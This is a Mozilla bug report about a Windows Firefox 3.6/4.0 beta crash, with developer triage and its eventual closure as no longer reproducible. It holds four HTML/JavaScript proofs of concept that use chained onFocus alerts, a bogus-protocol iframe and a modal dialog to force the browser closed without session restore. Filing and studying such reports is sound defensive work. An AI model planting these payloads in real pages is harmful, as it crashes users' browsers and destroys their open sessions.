Closed
Bug 640127
Opened 13 years ago
Closed 3 years ago
If I close An Alert Started By An onFocus Event, With The [x] button on Document Load, FireFox Closes/Crashes??
Categories
(Core :: DOM: Events, defect, P5)
Tracking
()
RESOLVED
WORKSFORME
People
(Reporter: cjb.exploit, Unassigned)
Details
(Keywords: crash, dataloss, testcase, Whiteboard: [sg:dos] )
Attachments
(6 files)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14 If An Alert/Prompt/Confirm or Wrong Protocol Error-Alert Is Activated With An onFocus Event in the <BODY>. If The First Prompt Is Closed With The [x] button, Focus Taken Away From FireFox, Clicking {OK} or [x] On The Next Alert/Prompt/Confirm or Wrong Protocol Error-Alert. Causes FireFox To Close/Crash? Its Tabs And Windows With No Restore Options Available on Restart. Reproducible: Always Steps to Reproduce: I Have Managed To Repoduce This In The Below Script/POC's ------------------------Main-POC------------------------------ <body onFocus='JavaScript:{ cjb = new Number( document.getElementById( "counter" ).value ); document.getElementById( "counter" ).value = ( cjb - 1 ); { if ( cjb == 0 ) ; } { if ( cjb == 1 ) alert( "Click {ok} Or [x]" ); } { if ( cjb == 2 ) alert("Clicking [x] Primes The Crash?"); } };'><input type='hidden' id='counter' value='2'></body> ------------------------EOF-MainPOC--------------------------- --------------------------POC1-------------------------------- 1.open POC1 Follow Steps 1a. Click [x] 1b. Click {OK} or [x] <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title></title> </head> <body onFocus='JavaScript:{ cjb = new Number( document.getElementById( "counter" ).value ); document.getElementById( "counter" ).value = ( cjb - 1 ); { if ( cjb == 0 ) ; } { if ( cjb == 1 ) alert( "Click {ok} Or [x]" ); } { if ( cjb == 2 ) alert("Clicking [x] Primes The Crash? \n"+ "Attacker Could Use About 80+ \\n To Force [x]"+ "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+ "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+ "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+ "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"); } };'> <input type='hidden' id='counter' value='2'> </body> </html> --------------------------EOF-POC1---------------------------- ----------------------------POC2------------------------------ 2.open POC2 Follow Steps {This Effects 4.12b } 1a. Click [x] 1b. Click {OK} or [x] <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title></title> </head> <body onFocus='javascript:{ cjb = new Number( document.getElementById( "counter" ).value ); document.getElementById( "counter" ).value = ( cjb - 1 ); { if ( cjb == 0 ) ; } { if ( cjb == 1 ) alert( "Click {ok} Or [x]" ); } { if ( cjb == 2 ) document.getElementById( "Target" ).src="FORCETHEPRESSOFXzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz:"; } };'> <iframe id="Target" src='' name="Target" width="0" height="0"> </iframe> <input type='hidden' id='counter' value='2'> </body> </html> --------------------------EOF-POC2---------------------------- ----------------------------POC3------------------------------ 3.open POC3 Follow Steps {This Example Dosent Work For latest Beta But Could} 3a. Click ModdalDialog 3b. Click [x] 3c. Click {OK} or [x] 3d. Close Dialog <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><title></title></head> <body> <center> <input type='button' value='Modal-Dialog' onClick='javascript:{ var Inject = document.getElementById("InjectString").value; var Header = document.getElementById("Modal_Header").value; window.showModalDialog( Header + Inject, "Arguments", "edge: Raised; "+ "center: No; "+ "status: No; "+ "resizable: No; "+ "dialogTop: 286px; "+ "dialogLeft: 998px; "+ "dialogWidth: 1214px; "+ "dialogHeight: 405px; ")}'> </center> <input id='Modal_Header' type='hidden' value="data:text/html;charset=utf-8,"> <input id='InjectString' type='hidden' value="<html><body onFocus='JavaScript:{cjb = new Number( document.getElementById( "counter" ).value );document.getElementById( "counter" ).value = ( cjb - 1 );{if ( cjb == 0 ) Create( "Error", "inErrorConsoleo" );}{if ( cjb == 1 ) alert( "Click {ok} Or [x]" );}{if ( cjb == 2 ) alert( "Clicking [x] Primes The Crash? \n"+"Attacker Could Use About 80+ \\n To Force [x]"+"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n");}};'><input type=hidden id=counter value=2></body></html>"> </body> </html> --------------------------EOF-POC3---------------------------- This Snip Alerts A Message After Application Closes/Crashes ----------------------------POC4------------------------------ <body onFocus='JavaScript:{ x = new Number( document.getElementById( "counter" ).value ); if ( x == 0 ) CreateError( InErrorConsole ); else document.getElementById( "counter" ).value = ( x - 1 ); alert( "press [x] " + x + " more times" ); };' onLoad='JavaScript:{alert("Crash Or Close?")};'> <input type='hidden' id='counter' value='2'></body> --------------------------EOF-POC4---------------------------- Actual Results: FireFox Closed or Crashed With No Warnings Or Options To Restore Windows, Tabs And Data Expected Results: Not Crash/Close. Warnings. Restore Options. If Two Windows Are Open (errorconsole,bookmarks etc...) Closing The Second Window With [x] Causes The Close/Crash. If Sequence called in modaldialog On the Close Of The dialog window With [x] FireFox Closes/Crashes All Tabs/Windows depending On How Many Are open {POC3}. Tested With The Latest Beta release 4.12b, Didnt Work At First But An Alert Dialog Can Still Be Ativated with { Wrong Protocol Error-Alert {POC2} } So Also Effects The Latest Beta release note: Beta 4.12b Dose Have option To Restore On Home Page and Warns On Multi Tab close.
Comment 1•13 years ago
|
||
Please use the "Add an attachment" link on the bug report to upload your files. Thanks.
Reporter | ||
Comment 2•13 years ago
|
||
Reporter | ||
Comment 3•13 years ago
|
||
Reporter | ||
Comment 4•13 years ago
|
||
Reporter | ||
Comment 5•13 years ago
|
||
Reporter | ||
Comment 6•13 years ago
|
||
Reporter | ||
Comment 7•13 years ago
|
||
(In reply to comment #1) > Please use the "Add an attachment" link on the bug report to upload > your files. Thanks. Example Files Uploaded :)
Reporter | ||
Updated•13 years ago
|
Hardware: x86 → All
Updated•13 years ago
|
Attachment #518278 -
Attachment mime type: text/plain → text/html
Updated•13 years ago
|
Attachment #518279 -
Attachment is private: true
Attachment #518279 -
Attachment mime type: text/plain → text/html
Updated•13 years ago
|
Attachment #518279 -
Attachment is private: false
Updated•13 years ago
|
Attachment #518280 -
Attachment mime type: text/plain → text/html
Updated•13 years ago
|
Attachment #518281 -
Attachment mime type: text/plain → text/html
Updated•13 years ago
|
Attachment #518282 -
Attachment mime type: text/plain → text/html
Comment 8•13 years ago
|
||
I do not see a problem on Mac. There's no 'x' button to close the modal dialogs, but "Esc" is supposed to do the equivalent. On a windows machine I can reproduce the problem by clicking the built-in "x" close-window button, but not if I hit Esc to cancel the first dialog. Why would that be any different? When it goes down it goes down fast -- no crash reporter comes up. Didn't have a newer windows debug build than 3.5.x handy, but in that version I get the following assertions before the crash: Somewhat early WARNING: requested removal of nonexistent window: nsWindowWatcher.cpp, line 1220 a few (4) WARNING: getting z level of unregistered window: nsWindowMediator.cpp, lin 635 Then ASSERTION: consider quit stopper out of bounds: 'mConsiderQuitStopper > 0', nsAppStartup.cpp, line 413 ASSERTION: Uh, LeaveModalState() called w/o a reachable top window?: 'Error', nsGlobalWindow.com, line 4514 WARNING: NS_ENSURE_SUCCESS(rv, 0) failed with result 0x8000FFFF: nsContentUtils.cpp, line 2717 ASSERTION: consider quit stopper out of bounds: 'mConsiderQuitStopper > 0', nsAppStartup.cpp, line 413 Remember those line numbers are from a really old build.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Comment 9•13 years ago
|
||
Kind of looks like we're shutting down on purpose, cleanly. After the assertions I see some of the usual shutdown assertions and the "--DOMWINDOW == XX" debug spew cleanly counting down as objects are freed
Comment 10•13 years ago
|
||
I don't see any problem in Firefox 3.6.15 on Linux. No problem in local (Linux x86-64) 1.9.2 debug build either. In a local (Linux x86-64) mozilla-central debug build I saw a few ###!!! ASSERTION: Some mouse button down events are nested?: '!aDocument || !mMouseDownEventHandlingDocument', file dom/base/nsFocusManager.h, line 99 ###!!! ASSERTION: mArguments wasn't cleaned up properly!: '!mArguments', file dom/base/nsGlobalWindow.cpp, line 993 but no problem other than that. I will try on Win XP too...
Comment 11•13 years ago
|
||
(In reply to comment #8) > Didn't have a newer windows debug build than 3.5.x handy [...] Just to be clear, 3.5.x only applied to the debug version. I also reproduced on 3.6.16pre and (with POC-2) 4.0b12 on Windows.
Comment 12•13 years ago
|
||
I can reproduce the bug on Windows XP. Here's a stack with a breakpoint in nsGlobalWindow::Close() - it appears we have nested modal loops here. I suspect this is the root cause of the bug. The difference between Windows and other platforms could be focus handling. It doesn't look like a security issue though. I think the worst that could happen is data loss - losing your session, preferences, bookmarks etc.
Updated•12 years ago
|
Group: core-security
Updated•12 years ago
|
Comment 13•6 years ago
|
||
https://bugzilla.mozilla.org/show_bug.cgi?id=1472046 Move all DOM bugs that haven’t been updated in more than 3 years and has no one currently assigned to P5. If you have questions, please contact :mdaly.
Priority: -- → P5
Comment 14•3 years ago
|
||
Closing this issue as Resolved > Worksforme since none of the attached files (after following the given steps) crash any of the latest versions of Firefox Nightly, beta or release on Windows 10.
Status: NEW → RESOLVED
Closed: 3 years ago
Resolution: --- → WORKSFORME
You need to log in
before you can comment on or make changes to this bug.
Description
•